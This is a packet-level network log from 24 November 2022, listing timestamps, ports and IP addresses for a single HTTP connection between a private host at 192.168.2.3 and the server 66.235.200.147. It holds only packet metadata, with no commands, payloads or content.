Nov 24, 2022 12:20:03.439157963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439166069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439177990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439184904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439203978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439203978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439218044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439224005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439244032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439248085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439258099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439270973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439284086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439291954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439311028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439330101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439349890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439349890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439349890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439369917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439372063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439394951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439397097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439416885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439416885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439435959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439438105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439454079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439455986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439471960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439475060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439490080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439502001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439521074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439541101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439544916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439567089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439568043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439587116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439589977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439605951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439613104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439625025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439630032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439650059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439652920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439668894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439673901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439685106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439693928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439713955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439729929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439734936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439754963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439755917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439776897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439795017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439805031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439814091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439815044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439835072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439836979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439861059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439881086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439893961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439899921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439915895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439918995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439944029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439944983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439966917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439970016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439985991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439987898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440005064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440016985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440030098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440037012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440051079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440056086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440069914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440074921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440085888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440099001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440109015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440121889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440140963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440154076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440160036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440177917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440180063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440196037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440207005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440220118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440226078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440242052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440260887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440279007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440279961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440296888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440310001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440323114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440335035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440344095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440355062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440363884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440382957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440385103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440401077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440403938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440417051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440426111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440440893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440448999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440454960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440468073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440486908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440493107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440504074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440519094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440521955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440540075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440543890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440557957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440572023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440582991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440602064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440617085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440620899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440639019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440659046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440659046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440681934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440685987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440705061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440709114 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440722942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440725088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440741062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440742970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440758944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440758944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440774918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440778017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440795898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440819025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440820932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440841913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440841913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440860987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440866947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440866947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440879107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440896988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440898895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440917969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440924883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440939903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440948963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440964937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.440973043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.440987110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441000938 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441288948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441313028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441314936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441330910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441332102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441349030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441350937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441366911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441368103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441385031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441390038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441401958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441402912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441426039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441435099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441450119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441452026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441466093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441468000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441483021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441493988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441502094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441510916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441519976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441528082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441539049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441549063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441557884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441564083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441576004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441582918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441593885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441612005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441627026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441629887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441653013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441653013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441678047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441679001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441701889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441705942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441720009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441730976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441746950 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441751003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441771030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441773891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441788912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441790104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441807985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441814899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441842079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441843033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441858053 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441863060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441880941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441895962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441910028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441924095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441927910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441937923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441956997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.441979885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.441981077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442003012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442028999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442032099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442042112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442050934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442065001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442070007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442079067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442089081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442101002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442101955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442118883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442132950 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442137003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442154884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442162037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442173958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442186117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442190886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442205906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442214012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442224026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442240953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442260027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442260027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442260027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442276001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442282915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442293882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442300081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442315102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442323923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442339897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442349911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442373037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442373037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442384005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442399979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442424059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442424059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442444086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442465067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442466021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442485094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442487001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442503929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442511082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442523003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442534924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442543030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442550898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442560911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442568064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442580938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442595959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442600012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442605972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442617893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442625046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442636967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442640066 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442655087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442657948 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442676067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442676067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442693949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442694902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442713976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442717075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442732096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442735910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442749023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442756891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442769051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442780018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442786932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442790985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442806005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442816019 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442826033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442832947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442845106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442852974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442862988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442873001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442895889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442915916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442915916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442915916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442935944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442939043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442955017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442958117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442975044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.442981958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.442994118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443002939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443013906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443021059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443031073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443044901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443046093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443063974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443084002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443099976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443103075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443109035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443121910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443141937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443150043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443161011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443180084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443192959 CET	49710	80	192.168.2.3	66.235.200.147
